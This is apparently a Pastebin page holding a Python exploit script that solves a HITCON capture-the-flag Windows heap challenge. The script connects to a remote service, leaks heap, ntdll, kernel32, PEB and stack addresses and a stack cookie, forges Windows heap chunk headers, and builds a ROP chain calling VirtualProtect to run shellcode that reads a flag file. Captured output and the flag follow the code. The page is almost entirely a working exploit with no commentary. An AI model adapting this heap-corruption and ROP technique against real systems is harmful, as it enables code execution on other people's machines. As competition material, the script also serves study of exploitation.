API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Oct 14th, 2019
876
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 6.97 KB | None | 0 0
raw download clone embed print report diff
  1. #!/usr/bin/python
  2. # -*- coding: utf-8 -*-
  3. import struct, socket, sys, os, telnetlib, hexdump
  4.  
  5. #################################################################################
  6.  
  7. def sock(host, port):
  8.   s = socket.create_connection((host, port))
  9.   return s, s.makefile('rw', bufsize=0)
  10.  
  11. def read_until(f, delim='\n'):
  12.   data = ''
  13.   while not data.endswith(delim): data += f.read(1)
  14.   return data
  15.  
  16. def shell(s):
  17.   t = telnetlib.Telnet()
  18.   t.sock = s
  19.   t.interact()
  20.  
  21. def p(a):  return struct.pack("<I",a&0xffffffff)
  22. def u(a):  return struct.unpack("<I",a)[0]
  23. def pQ(a): return struct.pack("<Q",a&0xffffffffffffffff)
  24. def uQ(a): return struct.unpack("<Q",a)[0]
  25.  
  26. def dbg(ss):
  27.   cs, ce = '\x1b[1;37m', '\x1b[00m' # White
  28.   print(cs + "[+] %s: 0x%x"%(ss, eval(ss)) + ce)
  29.  
  30. def make_asm(asm):
  31.   open("sc.asm", "wb").write(asm)
  32.   r = os.system("nasm -f bin sc.asm -o sc.bin -l sc.lst")
  33.   if r != 0: exit()
  34.   return open("sc.bin","rb").read()
  35.  
  36. def xxd(data):
  37.   hexdump.hexdump(data)
  38.  
  39. #################################################################################
  40.  
  41. def menu():
  42.   r = read_until(f, ">> ")
  43.   #print [r]
  44.   return r
  45.  
  46. def login():
  47.   f.write("1\n")
  48.   read_until(f, "User:")
  49.   f.write("orange\n")
  50.   read_until(f, "Password:")
  51.   f.write("godlike\n")
  52.   return menu()
  53.  
  54. def add(key, size, content, skip=False):
  55.   assert size < 0x1000
  56.   f.write("1\n")
  57.   read_until(f, "Key:")
  58.   f.write(("%s\n" % key)[:0x40])
  59.   read_until(f, "Size:")
  60.   f.write("%d\n" % size)
  61.   read_until(f, "Data:")
  62.   f.write("%s\n" % content)
  63.   if skip:
  64.     return
  65.   return menu()
  66.  
  67. def show(key, skip=False):
  68.   f.write("2\n")
  69.   read_until(f, "Key:")
  70.   f.write("%s\n" % key)
  71.   if not skip:
  72.     read_until(f, "Data:")
  73.   return menu()
  74.  
  75. def delete(key):
  76.   f.write("3\n")
  77.   read_until(f, "Key:")
  78.   f.write("%s\n" % key)
  79.   return menu()
  80.  
  81. #################################################################################
  82. if sys.argv[1] == 'r':
  83.   HOST, PORT = "13.230.51.176", 4869
  84.   STACK_START_OFS = 0x2000 # some brute force
  85.  
  86. else:
  87.   HOST, PORT = "192.168.164.130", 4869
  88.   STACK_START_OFS = 0x4000
  89.  
  90. ofs_virtual_protect = 0x1B680
  91. ofs_pop_rcx = 0x9217b #: pop rcx ; ret  ;  (4 found)
  92. ofs_pop_rdx = 0x8fb37 #: pop rdx ; pop r11 ; ret  ;  (1 found)
  93. ofs_pop_r8  = 0x2010b #: pop r8 ; ret  ;  (1 found)
  94. ofs_pop_r9  = 0x8fb34 #: pop r9 ; pop r10 ; pop r11 ; ret  ;  (1 found)
  95. ofs_pop_rax = 0x2010c #: pop rax ; ret  ;  (38 found)
  96. ofs_jmp_rax = 0x04c8b #: jmp rax ;  (17 found)
  97.  
  98. #################################################################################
  99. s, f = sock(HOST, PORT)
  100. login()
  101.  
  102. tag = pQ(0)
  103. print "[+] setup"
  104. add("Aa", 0x400, "A"*0x2f) # create
  105. add("Aa", 0x10, "A"*0xf) # re-create
  106. add(tag, 0x20, "z"*0xf) # victim
  107.  
  108. print "[+] first leak"
  109. leak_data = show("Aa")
  110. leak = uQ(leak_data[0x20:0x28])
  111. dbg("leak")
  112. heap = leak - 0x960
  113. dbg("heap")
  114.  
  115. print "[+] leak dll, pie, peb, and stack"
  116. def leak(addr, size=0x20, leak_data=leak_data):
  117.   forge = leak_data[:0x20] + pQ(addr) + pQ(size) + leak_data[0x30:]
  118.   add("Aa", 0x10, forge)
  119.   r = show(tag)
  120.   return uQ(r[:8]), r
  121.  
  122. ntdll = leak(heap + 0x2c0)[0] - 0x163d10
  123. ntdll &= ~0xfff
  124. dbg("ntdll")
  125. assert leak(ntdll)[1].startswith("MZ") # debug
  126.  
  127. dadadb = leak(ntdll + 0x15f000 + 0x62c8)[0] - 0xf8
  128. dbg("dadadb")
  129. assert leak(dadadb)[1].startswith("MZ") # debug
  130.  
  131. cookie = leak(dadadb + 0x5008)[0]
  132. dbg("cookie")
  133.  
  134. kernel32 = leak(ntdll + 0x15f000 + 0x6fd8)[0] - 0x3d8d0
  135. kernel32 &= ~0xfff
  136. dbg("kernel32")
  137. assert leak(kernel32)[1].startswith("MZ") # debug
  138.  
  139. encoding = leak(heap + 0x88)[0]
  140. dbg("encoding")
  141.  
  142. peb = leak(ntdll + 0x165308)[0] - 0x80
  143. dbg("peb")
  144.  
  145. ucrtbase = leak(ntdll + 0x178548)[0]
  146. dbg("ucrtbase")
  147. assert leak(ucrtbase)[1].startswith("MZ") # debug
  148.  
  149. stackbase = leak(peb + 0x1010)[0]
  150. dbg("stackbase")
  151. r = leak(stackbase + STACK_START_OFS, 0x1000)[1]
  152. while not "e\0x\0e\0" in r :
  153.   r += menu()
  154. menu()
  155. stack = stackbase + STACK_START_OFS + len(r) + 0x102
  156. dbg("stack")
  157.  
  158. print "[+] fix addr"
  159. leak(heap + 0x960) # for fix to delete
  160. leak_data = show("Aa")
  161.  
  162. print "[+] forge next and delete prev"
  163. def forge_next(addr, leak_data=leak_data):
  164.   forge = leak_data[:0x20+0x58] + pQ(addr) + leak_data[0x20+0x58+8:]
  165.   add("Aa", 0x10, forge)
  166.  
  167. forge_next(stack)
  168. delete(tag)
  169.  
  170. print "[+] create shellcode to heap"
  171. shellcode = make_asm("""
  172. BITS 64
  173. global _start
  174. _start:
  175.  
  176. open:
  177.  mov r15, %#x
  178.  lea rcx, [r15 + 0x5668]  ; file_fd
  179.  lea rdx, [rel FILENAME]  ; filename
  180.  lea r8, [rel PERMISSION] ; perm
  181.  lea rax, [r15 + 0x31A8]
  182.  call [rax]
  183.  
  184. read:
  185.  lea rcx, [r15 + 0x5f00]  ; buffer
  186.  mov rdx, 0x100           ; size
  187.  mov r8, 0x1              ; count
  188.  lea rax, [r15 + 0x5668]
  189.  mov r9, [rax]            ; file_fd
  190.  lea rax, [r15 + 0x3208]
  191.  call [rax]
  192.  
  193. puts:
  194.  lea rcx, [r15 + 0x5f00] ; buffer
  195.  lea rax, [r15 + 0x31d0]
  196.  call [rax]
  197.  
  198. LOOP:
  199.  jmp LOOP
  200.  
  201. FILENAME: db "flag.txt", 0
  202. PERMISSION: db "r", 0
  203. """ % (dadadb))
  204. #xxd(shellcode)
  205.  
  206. add("hogehoge", 0x100, shellcode)
  207. shellcode_addr = heap + 0x960
  208.  
  209. print "[+] forge note on to stack"
  210. fake_note = pQ(stack - 0x270) + pQ(0x300)
  211. #xxd(fake_note)
  212. show(fake_note, skip=True)
  213.  
  214. print "[+] create fake heap on to stack "
  215. def create_heap_header(size, prev_size):
  216.   busy=1
  217.   unused=0x10
  218.   size = size/0x10
  219.   prev_size = prev_size/0x10
  220.   raw = size | (busy<<16) | (((size&0xff)^((size>>8)&0xff)^busy)<<24) | (prev_size<<32) | (unused<<56)
  221.   return encoding ^ raw
  222.  
  223. fake_chunk  = tag + pQ(create_heap_header(0x10, 0x10))
  224. fake_chunk += pQ(0) + pQ(create_heap_header(0x20, 0x10))
  225. fake_chunk += pQ(0) + pQ(0)
  226. fake_chunk += pQ(0) + pQ(create_heap_header(0x10, 0x20))
  227. #xxd(fake_chunk)
  228.  
  229. rsp = stack - 0x2e0
  230.  
  231. virtual_protect = kernel32 + ofs_virtual_protect
  232. pop_rcx = ntdll + ofs_pop_rcx
  233. pop_rdx = ntdll + ofs_pop_rdx
  234. pop_r8  = ntdll + ofs_pop_r8
  235. pop_r9  = ntdll + ofs_pop_r9
  236. pop_rax = ntdll + ofs_pop_rax
  237. jmp_rax = ntdll + ofs_jmp_rax
  238.  
  239. rop  = pQ(pop_rcx)
  240. rop += pQ(heap)      # lpAddress
  241. rop += pQ(pop_rdx)
  242. rop += pQ(0x2000)    # dwSize
  243. rop += pQ(0xdeadbeef)
  244. rop += pQ(pop_r8)
  245. rop += pQ(0x40)      # flNewProtect (PAGE_EXECUTE_READWRITE)
  246. rop += pQ(pop_r9)
  247. rop += pQ(heap)      # lpflOldProtect
  248. rop += pQ(0xdeadbeef)
  249. rop += pQ(0xdeadbeef)
  250. rop += pQ(pop_rax)
  251. rop += pQ(virtual_protect)
  252. rop += pQ(jmp_rax)
  253. rop += pQ(shellcode_addr)
  254. #xxd(rop)
  255.  
  256. add(fake_chunk, 0x10, "Z"*0xe0 + pQ(rsp^cookie) + pQ(0)*4 + rop, skip=True)
  257.  
  258. print "[+] shell"
  259. shell(s)
  260.  
  261. """
  262. [+] setup
  263. [+] first leak
  264. [+] leak: 0x2114b5e0960
  265. [+] heap: 0x2114b5e0000
  266. [+] leak dll, pie, peb, and stack
  267. [+] ntdll: 0x7ff94e160000
  268. [+] dadadb: 0x7ff7de140000
  269. [+] cookie: 0x5e6f3b24ab69
  270. [+] kernel32: 0x7ff94e010000
  271. [+] encoding: 0x661ce85fa323
  272. [+] peb: 0x9440c1e000
  273. [+] ucrtbase: 0x7ff94b280000
  274. [+] stackbase: 0x9440b9d000
  275. [+] stack: 0x9440b9f980
  276. [+] fix addr
  277. [+] forge next and delete prev
  278. [+] create shellcode to heap
  279. [+] forge note on to stack
  280. [+] create fake heap on to stack
  281. [+] shell
  282. Done!
  283. hitcon{Oh_U_got_the_Exc4libur_in_ddaa-s_HEAP}
  284. Try to learn breath of shadow to kill demon !
  285. """
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!